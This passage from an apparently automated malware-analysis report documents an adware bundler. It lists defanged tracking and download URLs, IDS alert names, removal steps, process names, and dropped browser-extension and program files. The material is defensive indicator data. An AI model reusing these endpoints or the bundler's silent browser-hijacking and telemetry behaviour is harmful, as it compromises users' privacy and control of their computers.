    hxxp://www.bigspeedpro.com/webplayer/appshat/config.json 78.138.126.82
    hxxp://bi.bisrv.com/pinger?event_type=install_start&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=appshat_madness&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=3&index_in_screen=1&index_in_session=3&0.23028674511194408
    hxxp://download.genieo.com/core/release/r16741/manifest.xml 54.231.244.1
    hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c= 23.43.139.27
    hxxp://install.sourceapp.info/mg?alpha=SVwbaBdSRnpqbQtkNEIYdhVZexIXcRo5YFIuSQ== 70.186.131.141
    hxxp://download.genieo.com/core/release/r16741/updater_manifest.xml 54.231.244.1
    hxxp://stats.ourclientinputsrv.com/stats.gif?action=daily&app=65743&bic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&ver=1_36_01_22&installtime=1422513827&os=7&browser=ie&browserver=10&ffver=29&chromever=35&srcid=000820&subid=0&zdata=appshatmadness&appver=21&bgver=1&pluginsver=17&curtime=1422513849&lifetime=22&rnd=6039 54.231.16.188
    hxxp://bi.bisrv.com/pinger?event_type=install_fail&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=sourceapp_b2b&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=2&index_in_screen=1&index_in_session=2&0.005616250394906319
    hxxp://install.sourceapp.info/mg?alpha=Q2QKaQJ6JUg3MX9TJUMNQiBZZAJDIggYAkMPCyofMzRLCnQTGRcba0NUCx0lGnASNAgxEmxsNithXUcWUGwwZHc7MxYmCRNSQzZrVi9y 70.186.131.141
    hxxp://bi.bisrv.com/pinger?event_type=install_start&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=geneio_non_search_for_pc&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=4&index_in_screen=1&index_in_session=4&0.6194686390575159
    hxxp://as.perfcreatives.com/pixel.gif 178.33.88.164
    hxxp://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl 88.221.133.16
    hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=100&n=init_start_funnel_step_name&rnd=1422513827 54.231.0.212
    hxxp://bi.bisrv.com/pinger?event_type=offer_shown&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=geneio_non_search_for_pc&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=4&index_in_screen=1&index_in_session=4&display_height=75&0.7763572020438432
    hxxp://download.genieo.com/core/release/r16741/trayapp_setup.gen 54.231.244.1
    hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAxNF3PJUX7iAOhAP2oGxcI= 23.43.139.27
    hxxp://www.mypdfconverter.com/images/pixel.gif 178.33.88.175
    hxxp://www.appshat.com/home 173.194.71.121
    hxxp://logs.ourclientinputsrv.com/monetization.gif?event=3&ibic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&campaign=000820&country=ua&app=65743&os=7(64bit)&defbro=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&starttime=1422513827&asw=0_1073750533_-2147483648_0&browser=ff,ie,de&rnd=1422513827 69.16.175.42
    hxxp://errors.ourclientinputsrv.com/utility.gif?report=fdata&f=1&c=000820&i=10000&n=deploy_end_funnel_step_name&rnd=1422513853 54.231.0.212
    hxxp://install.sourceapp.info/mg?alpha=Q2QKaQIuUEMZZzMfJUMNfC1Iegcddw5VQjhpV25cFmAnP0cAW10SbDcjFW5SaXMSSQ1GE3lvR10QRkdiQzNrYQJfZkBycmY7Gh5VKTclUw0BeAw4XlVhXwgCNQoINh5FNVZiBxYYCgJsQSYWb1Mfcg88fkMEPShNHD8bNFEXJys4eS1mQnAEGD0aZlU bnwGCgZ8GmUYWGJJQFxmBwl SB8OBw8M 70.186.131.141
    hxxp://dl.ourclientinputsrv.com/smt2b/all/hat/row/setup.exe_d 69.16.175.42
    hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ/xkCfyHfJr7GQ6M658NRZ4SHo/AQUCPVR6Pv+PT1kNnxoz1t4qN+5xTcCEGC2x6sSmevembHfY1acIZk= 23.43.139.27
    hxxp://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG+EAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQCEHQmdFrc480Fy/u/h0ldP 178.255.83.1
    hxxp://ocsp2.globalsign.com/gscodesigng2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRruLd2WRFk6cRYGFIqkQ4J8hxDogQUCG7YtpyKv+0+18N0XcyAH6gvUHoCEhEhR5HFQnItXEGJJ9zEpk51tw== 108.162.232.196
    hxxp://install.sourceapp.info/if?alpha=fSMdXUFYdGp/eUZaMndOfGdOUEF9fxF1TEgQCUwEL39XGgRoUn50aj0yVCpQYSNBTmg/LCdSAWEkSR9XeWhjVSkRI11FQy5pUhsZQHIEcB5/Pl5dCyhxRSE3Dk4eHit6bzQ4QSlCGSwtDXxzLRUjKBB+T31ddCl3YiM+A0EtJWw+b0Z9AzgZdTtwAUhdQCxqB2xnDVFbZiVeZ0wJTR4aQ3tzX0lMNl0fKSt7YxcPRXdHWlcwJAA7H18+ZxkXAy0gEx9odSxeQVksYQJaFAE9ajVGPT4NW0g0WhdyTG4uCUAePzsBHklPBkN/cDgiHUsWJShKUXlrCjAZViMoMVgEOikiAmFXMTgYGXggTBsEBjMLcRxpalhPRDR4GX1RdV0PWQg5MRgUGjhVDS0xfn8GXRAgJVtdfzsMIAoTIXQfWkdyZmBDNwV+HB0WcigGLUpWfzJwGy8nflJEL3McMSJPHFtKHmJkHw1JLElDKW9yKBcKViw8GBQ8fVdlAlJsJUwLUnh8ZFs9ESBVQUYmeA9OQEUuDU4Ebn1OEA0NWw9wA15deUYfPzcQF1RLT35YTAZxdQJTeiVsXXskBiZVb29jDEJB 70.186.131.141
    dns.msftncsi.com 131.107.255.255
    aus3.mozilla.org 63.245.217.138
    www.mystartsearch.com 69.28.57.26
    up.soft365.com


    IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

    SURICATA UDPv4 invalid checksum
    SURICATA IPv4 invalid checksum
    ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
    ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
    ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
    ET MALWARE Win32/Toolbar.CrossRider.A Checkin
    ET MALWARE Suspicious Mozilla User-Agent - Likely Fake (Mozilla/4.0)

    Traffic

    Web Traffic was not found.

    The Application connects to the servers at the folowing location(s):

    Strings from Dumps were not found.


    Remove it with Ad-Aware

    1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. Update the definition files.
    3. Run a full scan of your computer.


    Manual removal*

    1. Terminate malicious process(es) (How to End a Process With the Task Manager):

      BaofengUpdate.exe:3600
      BaofengUpdate.exe:3212
      D79A.tmp:2264
      XTab_v4.0.exe:3152
      smt_mystartsearch.exe:3356
      ProtectService.exe:3120
      ProtectService.exe:3188
      Setup.exe:4008
      Setup.exe:468
      TPAutoConnSvc.exe:1844
      appshat.exe:4072
      biclient.exe:2452
      unInstpw64.exe:2004
      11a9fc6b-cfbc-4d3c-943b-7e1062933d01-4.exe:3456
      powershell.exe:976
      powershell.exe:1020
      powershell.exe:3596
      appshat_generic.exe:108
      HPNotify.exe:3132
      gentray.exe:2824
      gentray.exe:3260
      gentray.exe:3080
      gentray.exe:1556
      genieo_setup.gen:3380
      cmdshell.exe:3084
      genieo_setup.exe:1552
      STab_Down_6.0.6.6.exe:3216
      App Lid-codedownloader.exe:3672
      App Lid-codedownloader.exe:3264
      converter.exe:4068
      regsvr32.exe:3688
      regsvr32.exe:3720
      regsvr32.exe:3404
      webplayer_installer.exe:716
      framework_setup.gen:1048
      InstallGenieo.exe:4052
      InstallGenieo.exe:1660
      cscript.exe:3120
      MsiExec.exe:3588
      MsiExec.exe:1612
      genupdater.exe:3144
      Vlwgfsqfpaz.exe:3296
      F365.tmp:3556
      firsttime_setup.exe:3488
      MSIEXEC.EXE:3852

    2. Delete the original Application file.
    3. Delete or disinfect the following files created/modified by the Application:

      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\es\locale.properties (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\prefs.js (591 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\lib\jquery.autocomplete.js (12 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\bk_shadow.png (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\newtab.ico (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\install.rdf (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\zh-TW\locale.properties (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\Thumbs.db (27 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\pack\xagainit.js (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\simple.css (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\googlelogo.png (14 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\tools\urlrequestor.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\properties.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\speed_dial.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\bg.png (673 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\checkbox_select.png (783 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\loading_bg.png (159 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\module\search.js (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\ru\locale.properties (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\bg1.png (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\28A7.tmp (90 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\lib\doT.min.js (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\it-CH\locale.properties (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\default_logo.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr\locale.properties (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\button.png (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\tools\popup_image_helper.js (693 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\BFVUpdateM.dll (110 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\min.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.json (196 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\quick_start.xul (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\settings.js (5 bytes)
      C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\last_tab.js (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\pl\locale.properties (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\module\hotSearch.js (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code4.jpg (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr-BE\locale.properties (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\defaults\preferences\preferences.js (379 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\remoterequest.js (2 bytes)
      %Program Files% (x86)\Mozilla Firefox\browser\searchplugins\mystartsearch.xml (565 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\checked.png (222 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\en\locale.properties (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\uninstallDlg2.xml (19 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\unchecked.png (135 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Web Data (1518 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\module\stat.js (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\tr\locale.properties (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\loading.gif (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\style.css (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\it\locale.properties (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\pack\ga.js (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\lib\jquery-2.1.0.min.js (3312 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\zh-CN\locale.properties (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code3.jpg (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code1.jpg (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\Thumbs.db (42 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\google_trends.png (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.ini (480 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\close.png (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\ru-MO\locale.properties (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\restoreprefs.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code5.jpg (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\tools\about_blank_hook.js (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\include\tools\misc.js (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal (6322 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\module\mostgrid.js (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr-CH\locale.properties (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\addonmanager.js (531 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\icon.png (628 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\422.json (520 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr-CA\locale.properties (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\en-US\locale.properties (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\es-419\locale.properties (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\quick_start.js (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\vi\locale.properties (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\pt-BR\locale.properties (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\js.js (660 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code6.jpg (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\UninstallManager.exe (13122 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\MessageBox.xml (3 bytes)
      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\279D.tmp (89 bytes)
      C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\checkbox.png (545 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\js\pack\common.js (10 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\aes.js (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome.manifest (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\scrollbar.bmp (37 bytes)
      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\skin\logo.png (5 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\locale\fr-LU\locale.properties (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\defaults\preferences\fvd.js (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\modules\misc.js (11 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\loading_light.png (139 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\button1.png (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1422513761_xpi\chrome\content\index.html (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\images\code\code2.jpg (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\wpm_v20.0.0.1714.exe (930 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WebDataJs (43 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\STab_Down_6.0.6.6.exe (114 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\422.db (220 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SourceApp\lm (128 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\NSISEncrypt.dll (3412 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\UserInfo.dll (8 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ilg (303824 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\WmiInspector.dll (3137 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\System.dll (23 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\nsExec.dll (14 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\inetc.dll (44 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SourceApp\SourceApp.mg.exe (7798 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SourceApp\tlg (41 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\IpConfig.dll (4254 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SourceApp\mj (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\nsJSON.dll (15 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaA3CF.tmp\ExecDos.dll (13 bytes)
      %Program Files% (x86)\XTab\web\img\googlelogo.png (7 bytes)
      %Program Files% (x86)\XTab\web\_locales\zh-TW\messages.json (3 bytes)
      %Program Files% (x86)\XTab\skin\btn.png (2 bytes)
      %Program Files% (x86)\XTab\install.data (68 bytes)
      %Program Files% (x86)\XTab\web\_locales\zh-CN\messages.json (3 bytes)
      %Program Files% (x86)\XTab\web\_locales\en-US\messages.json (3 bytes)
      %Program Files% (x86)\XTab\HPNotify.exe (18027 bytes)
      %Program Files% (x86)\XTab\conf (1606 bytes)
      %Program Files% (x86)\XTab\web\img\loading.gif (5 bytes)
      %Program Files% (x86)\XTab\BrowerWatchFF.dll (23 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nskDD07.tmp\System.dll (23 bytes)
      %Program Files% (x86)\XTab\web\indexIE8.html (1816 bytes)
      %Program Files% (x86)\XTab\web\js\library.js (4216 bytes)
      %Program Files% (x86)\XTab\web\_locales\pt\messages.json (4 bytes)
      %Program Files% (x86)\XTab\web\img\arrow.png (259 bytes)
      %Program Files% (x86)\XTab\web\ver.txt (5 bytes)
      %Program Files% (x86)\XTab\web\_locales\fr-BE\messages.json (3 bytes)
      %Program Files% (x86)\XTab\skin\input_bk.png (2 bytes)
      %Program Files% (x86)\XTab\web\_locales\pl\messages.json (3 bytes)
      %Program Files% (x86)\XTab\web\_locales\it-IT\messages.json (4 bytes)
      %Program Files% (x86)\XTab\skin\conf_back.png (1623 bytes)
      %Program Files% (x86)\XTab\web\_locales\fr-CA\messages.json (3 bytes)
      %Program Files% (x86)\XTab\web\img\weather\0.png (1 bytes)
      %Program Files% (x86)\XTab\skin\btn_apply.png (6 bytes)
      %Program Files% (x86)\XTab\skin\conf.xml (8 bytes)
      %Program Files% (x86)\XTab\CmdShell.exe (1681 bytes)
      %Program Files% (x86)\XTab\web\indexIE.html (1 bytes)
      %Program Files% (x86)\XTab\web\_locales\ru-MO\messages.json (4 bytes)
      %Program Files% (x86)\XTab\web\js\xagainit-ie8.js (3 bytes)
      %Program Files% (x86)\XTab\skin\about_bk.png (1436 bytes)
      %Program Files% (x86)\XTab\web\_locales\es-ES\messages.json (3 bytes)
      %Program Files% (x86)\XTab\skin\main.xml (4 bytes)
      %Program Files% (x86)\XTab\web\img\default_add_logo_hover.png (1 bytes)
      %Program Files% (x86)\XTab\BrowserAction.dll (33992 bytes)
      %Program Files% (x86)\XTab\skin\radio_2.png (3 bytes)
      %Program Files% (x86)\XTab\msvcr110.dll (22156 bytes)
